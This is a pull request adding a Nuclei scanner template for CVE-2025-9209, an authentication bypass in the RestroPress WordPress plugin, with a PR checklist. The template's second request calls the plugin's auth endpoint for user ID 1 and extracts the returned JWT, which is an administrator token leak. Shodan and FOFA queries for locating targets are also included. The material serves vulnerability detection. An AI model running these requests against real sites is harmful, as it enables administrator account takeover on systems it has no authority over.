### PR TITLE
Add CVE-2025-9209 - RestroPress 3.0.0-3.2.1 - Authentication Bypass

### DIFF
--- a/http/cves/2025/CVE-2025-9209.yaml
+++ b/http/cves/2025/CVE-2025-9209.yaml
@@ -1,7 +1,7 @@
 id: CVE-2025-9209
 
 info:
-  name: RestroPress 3.0.0-3.2.1 - Authentication Bypass via JWT Forgery
+  name: RestroPress 3.0.0-3.2.1 - Authentication Bypass
   author: 0x_Akoko
   severity: critical
   description: |
@@ -23,7 +23,7 @@ info:
     max-request: 2
     shodan-query: http.html:"/wp-content/plugins/restropress/"
     fofa-query: body="/wp-content/plugins/restropress/"
-  tags: cve,cve2025,wordpress,wp-plugin,restropress,jwt,authbypass,unauth
+  tags: cve,cve2025,wordpress,wp,wp-plugin,restropress,auth-bypass
 
 flow: http(1) && http(2)
 
@@ -37,7 +37,7 @@ http:
       - type: dsl
         dsl:
           - 'status_code == 200'
-          - 'contains(body, "=== RestroPress")'
+          - 'contains(body, "RestroPress")'
           - 'compare_versions(version, ">= 3.0.0", "<= 3.2.1")'
         condition: and
         internal: true
@@ -47,9 +47,9 @@ http:
         part: body
         name: version
         group: 1
-        internal: true
         regex:
           - '(?i)Stable tag:\s*([0-9.]+)'
+        internal: true
 
   - raw:
       - |

--- a/http/cves/2025/CVE-2025-9209.yaml
+++ b/http/cves/2025/CVE-2025-9209.yaml
@@ -1,0 +1,74 @@
+id: CVE-2025-9209
+
+info:
+  name: RestroPress 3.0.0-3.2.1 - Authentication Bypass via JWT Forgery
+  author: 0x_Akoko
+  severity: critical
+  description: |
+   RestroPress Online Food Ordering System WordPress plugin 3.0.0 to 3.1.9.2 contains an authentication bypass caused by exposure of user private tokens and API data via /wp-json/wp/v2/users endpoint, letting unauthenticated attackers forge JWT tokens and authenticate as other users including administrators, exploit requires no authentication.
+  impact: |
+   Unauthenticated attackers can forge JWT tokens and authenticate as any user, including administrators, leading to full account takeover.
+  remediation: |
+   Update to the latest version beyond 3.1.9.2.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/restropress/restropress-online-food-ordering-system-300-3192-unauthenticated-information-exposure-to-authentication-bypass-via-forged-jwt
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-9209
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-9209
+    cwe-id: CWE-287
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: http.html:"/wp-content/plugins/restropress/"
+    fofa-query: body="/wp-content/plugins/restropress/"
+  tags: cve,cve2025,wordpress,wp-plugin,restropress,jwt,authbypass,unauth
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /wp-content/plugins/restropress/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "=== RestroPress")'
+          - 'compare_versions(version, ">= 3.0.0", "<= 3.2.1")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        part: body
+        name: version
+        group: 1
+        internal: true
+        regex:
+          - '(?i)Stable tag:\s*([0-9.]+)'
+
+  - raw:
+      - |
+        GET /wp-json/rp/v1/auth?user_id=1 HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: probe-{{randstr}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "application/json")'
+          - 'contains(body, "\"token\":\"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.")'
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        name: jwt_token
+        group: 1
+        regex:
+          - '"token"\s*:\s*"(eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+)"'


### PR DESCRIPTION
…ia JWT Forgery

RestroPress plugin versions 3.0.0 to 3.1.9.2 are vulnerable to an authentication bypass due to JWT forgery, allowing unauthenticated users to authenticate as any user, including admins. Update to the latest version beyond 3.1.9.2 to remediate this issue.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
